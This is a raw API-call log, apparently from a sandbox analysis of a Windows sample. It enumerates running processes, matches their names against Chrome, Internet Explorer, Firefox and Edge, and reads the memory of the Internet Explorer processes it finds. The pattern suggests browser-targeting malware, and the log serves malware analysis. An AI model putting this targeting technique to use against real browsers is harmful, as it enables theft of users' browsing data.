	[0198.694] StrStrIA (lpFirst="js_sound.exe", lpSrch="iexplore.exe") returned 0x0
	[0198.694] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.694] StrStrIA (lpFirst="js_sound.exe", lpSrch="firefox.exe") returned 0x0
	[0198.695] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.695] StrStrIA (lpFirst="js_sound.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0198.695] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xac0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beast-dry.exe")) returned 1
	[0198.695] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xac0) returned 0x170c
	[0198.696] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.696] StrStrIA (lpFirst="beast-dry.exe", lpSrch="chrome.exe") returned 0x0
	[0198.696] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.696] StrStrIA (lpFirst="beast-dry.exe", lpSrch="iexplore.exe") returned 0x0
	[0198.696] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.696] StrStrIA (lpFirst="beast-dry.exe", lpSrch="firefox.exe") returned 0x0
	[0198.697] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.697] StrStrIA (lpFirst="beast-dry.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0198.697] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xad0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="forecastsgeographic.exe")) returned 1
	[0198.697] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xad0) returned 0x1710
	[0198.698] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.698] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="chrome.exe") returned 0x0
	[0198.698] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.698] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="iexplore.exe") returned 0x0
	[0198.699] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.699] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="firefox.exe") returned 0x0
	[0198.699] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.699] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0198.700] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xae0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="reno.exe")) returned 1
	[0198.701] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xae0) returned 0x1714
	[0198.701] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.701] StrStrIA (lpFirst="reno.exe", lpSrch="chrome.exe") returned 0x0
	[0198.701] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.701] StrStrIA (lpFirst="reno.exe", lpSrch="iexplore.exe") returned 0x0
	[0198.701] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.701] StrStrIA (lpFirst="reno.exe", lpSrch="firefox.exe") returned 0x0
	[0198.701] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.701] StrStrIA (lpFirst="reno.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0198.702] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaf0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="specreformwear.exe")) returned 1
	[0198.702] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaf0) returned 0x1718
	[0198.702] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.702] StrStrIA (lpFirst="specreformwear.exe", lpSrch="chrome.exe") returned 0x0
	[0198.703] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.703] StrStrIA (lpFirst="specreformwear.exe", lpSrch="iexplore.exe") returned 0x0
	[0198.703] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.703] StrStrIA (lpFirst="specreformwear.exe", lpSrch="firefox.exe") returned 0x0
	[0198.704] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.704] StrStrIA (lpFirst="specreformwear.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0198.704] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="rr_publications.exe")) returned 1
	[0198.705] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb00) returned 0x171c
	[0198.705] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.705] StrStrIA (lpFirst="rr_publications.exe", lpSrch="chrome.exe") returned 0x0
	[0198.705] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.705] StrStrIA (lpFirst="rr_publications.exe", lpSrch="iexplore.exe") returned 0x0
	[0198.706] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.706] StrStrIA (lpFirst="rr_publications.exe", lpSrch="firefox.exe") returned 0x0
	[0198.706] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.706] StrStrIA (lpFirst="rr_publications.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0198.707] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb10, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="solo.exe")) returned 1
	[0198.707] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb10) returned 0x1720
	[0198.707] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.707] StrStrIA (lpFirst="solo.exe", lpSrch="chrome.exe") returned 0x0
	[0198.708] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.708] StrStrIA (lpFirst="solo.exe", lpSrch="iexplore.exe") returned 0x0
	[0198.708] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.708] StrStrIA (lpFirst="solo.exe", lpSrch="firefox.exe") returned 0x0
	[0198.708] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.708] StrStrIA (lpFirst="solo.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0198.708] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb20, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beam.exe")) returned 1
	[0198.709] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb20) returned 0x1724
	[0198.709] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.709] StrStrIA (lpFirst="beam.exe", lpSrch="chrome.exe") returned 0x0
	[0198.709] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.709] StrStrIA (lpFirst="beam.exe", lpSrch="iexplore.exe") returned 0x0
	[0198.710] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.710] StrStrIA (lpFirst="beam.exe", lpSrch="firefox.exe") returned 0x0
	[0198.710] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.710] StrStrIA (lpFirst="beam.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0198.710] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb30, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="configurations.exe")) returned 1
	[0198.711] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb30) returned 0x1728
	[0198.711] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.711] StrStrIA (lpFirst="configurations.exe", lpSrch="chrome.exe") returned 0x0
	[0198.711] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.711] StrStrIA (lpFirst="configurations.exe", lpSrch="iexplore.exe") returned 0x0
	[0198.712] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.712] StrStrIA (lpFirst="configurations.exe", lpSrch="firefox.exe") returned 0x0
	[0198.712] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.712] StrStrIA (lpFirst="configurations.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0198.712] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="fact-film-anticipated.exe")) returned 1
	[0198.713] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb40) returned 0x172c
	[0198.713] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.713] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="chrome.exe") returned 0x0
	[0198.714] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.714] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="iexplore.exe") returned 0x0
	[0198.714] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.715] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="firefox.exe") returned 0x0
	[0198.715] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.715] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0198.716] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb50, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wanting villages.exe")) returned 1
	[0198.716] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb50) returned 0x1730
	[0198.716] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.716] StrStrIA (lpFirst="wanting villages.exe", lpSrch="chrome.exe") returned 0x0
	[0198.717] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.717] StrStrIA (lpFirst="wanting villages.exe", lpSrch="iexplore.exe") returned 0x0
	[0198.717] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.717] StrStrIA (lpFirst="wanting villages.exe", lpSrch="firefox.exe") returned 0x0
	[0198.718] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.718] StrStrIA (lpFirst="wanting villages.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0198.718] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="engagementresearchersmonkey.exe")) returned 1
	[0198.719] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb60) returned 0x1734
	[0198.719] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.719] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="chrome.exe") returned 0x0
	[0198.719] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.719] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="iexplore.exe") returned 0x0
	[0198.720] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.720] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="firefox.exe") returned 0x0
	[0198.721] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.721] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0198.721] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="surgical-marcus.exe")) returned 1
	[0198.722] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb70) returned 0x1738
	[0198.722] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.722] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="chrome.exe") returned 0x0
	[0198.722] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.722] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="iexplore.exe") returned 0x0
	[0198.723] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.723] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="firefox.exe") returned 0x0
	[0198.723] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.723] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0198.724] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0xc0c, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1
	[0198.724] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xc38) returned 0x173c
	[0198.724] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.724] StrStrIA (lpFirst="iexplore.exe", lpSrch="chrome.exe") returned 0x0
	[0198.725] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.725] StrStrIA (lpFirst="iexplore.exe", lpSrch="iexplore.exe") returned="iexplore.exe"
	[0198.725] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.725] StrStrIA (lpFirst="iexplore.exe", lpSrch="firefox.exe") returned 0x0
	[0198.725] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.725] StrStrIA (lpFirst="iexplore.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0198.725] NtQueryInformationProcess (in: ProcessHandle=0x173c, ProcessInformationClass=0x0, ProcessInformation=0x101f2e4, ProcessInformationLength=0x18, ReturnLength=0x101f300 | out: ProcessInformation=0x101f2e4, ReturnLength=0x101f300) returned 0x0
	[0198.726] ReadProcessMemory (in: hProcess=0x173c, lpBaseAddress=0x7ffdb000, lpBuffer=0x101f0cc, nSize=0x1d8, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f0cc*, lpNumberOfBytesRead=0x101f310*=0x1d8) returned 1
	[0198.726] ReadProcessMemory (in: hProcess=0x173c, lpBaseAddress=0x2b11c0, lpBuffer=0x101ee3c, nSize=0x290, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101ee3c*, lpNumberOfBytesRead=0x101f310*=0x290) returned 1
	[0198.726] ReadProcessMemory (in: hProcess=0x173c, lpBaseAddress=0x2b1998, lpBuffer=0x101f40c, nSize=0x20, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f40c*, lpNumberOfBytesRead=0x101f310*=0x20) returned 1
	[0198.726] StrStrIW (lpFirst="Winsta0\\Default", lpSrch="default") returned="Default"
	[0198.726] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0xc38, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1
	[0198.727] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xc94) returned 0x1740
	[0198.727] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.727] StrStrIA (lpFirst="iexplore.exe", lpSrch="chrome.exe") returned 0x0
	[0198.727] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.727] StrStrIA (lpFirst="iexplore.exe", lpSrch="iexplore.exe") returned="iexplore.exe"
	[0198.727] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.727] StrStrIA (lpFirst="iexplore.exe", lpSrch="firefox.exe") returned 0x0
	[0198.728] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.728] StrStrIA (lpFirst="iexplore.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0198.728] NtQueryInformationProcess (in: ProcessHandle=0x1740, ProcessInformationClass=0x0, ProcessInformation=0x101f2e4, ProcessInformationLength=0x18, ReturnLength=0x101f300 | out: ProcessInformation=0x101f2e4, ReturnLength=0x101f300) returned 0x0
	[0198.728] ReadProcessMemory (in: hProcess=0x1740, lpBaseAddress=0x7ffde000, lpBuffer=0x101f0cc, nSize=0x1d8, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f0cc*, lpNumberOfBytesRead=0x101f310*=0x1d8) returned 1
	[0198.728] ReadProcessMemory (in: hProcess=0x1740, lpBaseAddress=0x911c0, lpBuffer=0x101ee3c, nSize=0x290, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101ee3c*, lpNumberOfBytesRead=0x101f310*=0x290) returned 1
	[0198.728] ReadProcessMemory (in: hProcess=0x1740, lpBaseAddress=0x919ba, lpBuffer=0x101f40c, nSize=0x20, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f40c*, lpNumberOfBytesRead=0x101f310*=0x20) returned 1
	[0198.728] StrStrIW (lpFirst="Winsta0\\Default", lpSrch="default") returned="Default"
	[0198.728] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x914, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x34c, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1
	[0198.729] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x914) returned 0x1744
	[0198.729] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.729] StrStrIA (lpFirst="taskeng.exe", lpSrch="chrome.exe") returned 0x0
	[0198.730] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.730] StrStrIA (lpFirst="taskeng.exe", lpSrch="iexplore.exe") returned 0x0
	[0198.730] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.730] StrStrIA (lpFirst="taskeng.exe", lpSrch="firefox.exe") returned 0x0
	[0198.730] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.730] StrStrIA (lpFirst="taskeng.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0198.730] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x914, pcPriClassBase=6, dwFlags=0x0, szExeFile="tadiapce.exe")) returned 1
	[0198.731] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x214) returned 0x1748
	[0198.731] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.731] StrStrIA (lpFirst="tadiapce.exe", lpSrch="chrome.exe") returned 0x0
	[0198.732] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.732] StrStrIA (lpFirst="tadiapce.exe", lpSrch="iexplore.exe") returned 0x0
	[0198.732] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.732] StrStrIA (lpFirst="tadiapce.exe", lpSrch="firefox.exe") returned 0x0
	[0198.732] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.732] StrStrIA (lpFirst="tadiapce.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0198.733] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaa8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0198.733] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaa8) returned 0x174c
	[0198.734] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.734] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0198.734] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.734] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0198.735] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.735] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0198.735] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.735] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0198.735] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x110, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x214, pcPriClassBase=6, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0198.736] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb98, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1
	[0198.737] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb98) returned 0x1750
	[0198.737] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.737] StrStrIA (lpFirst="dllhost.exe", lpSrch="chrome.exe") returned 0x0
	[0198.737] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.737] StrStrIA (lpFirst="dllhost.exe", lpSrch="iexplore.exe") returned 0x0
	[0198.738] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.738] StrStrIA (lpFirst="dllhost.exe", lpSrch="firefox.exe") returned 0x0
	[0198.738] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.738] StrStrIA (lpFirst="dllhost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0198.738] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0198.739] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x6d8) returned 0x1754
	[0198.739] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.739] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0198.739] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.739] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0198.739] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.739] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0198.740] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.740] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0198.740] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 0
	[0198.741] CloseHandle (hObject=0x188) returned 1
	[0198.741] Sleep (dwMilliseconds=0x64) 
	[0198.838] GetCurrentProcessId () returned 0x110
	[0198.838] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x188
	[0198.840] Process32First (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1
	[0198.841] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x51, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1
	[0198.842] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1
	[0198.843] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x104) returned 0x1758
	[0198.843] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.843] StrStrIA (lpFirst="smss.exe", lpSrch="chrome.exe") returned 0x0
	[0198.843] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.843] StrStrIA (lpFirst="smss.exe", lpSrch="iexplore.exe") returned 0x0
	[0198.843] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.843] StrStrIA (lpFirst="smss.exe", lpSrch="firefox.exe") returned 0x0
	[0198.844] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.844] StrStrIA (lpFirst="smss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0198.844] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1
	[0198.844] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x148) returned 0x175c
	[0198.845] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.845] StrStrIA (lpFirst="csrss.exe", lpSrch="chrome.exe") returned 0x0
	[0198.845] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.845] StrStrIA (lpFirst="csrss.exe", lpSrch="iexplore.exe") returned 0x0
	[0198.845] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.845] StrStrIA (lpFirst="csrss.exe", lpSrch="firefox.exe") returned 0x0
	[0198.845] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.846] StrStrIA (lpFirst="csrss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
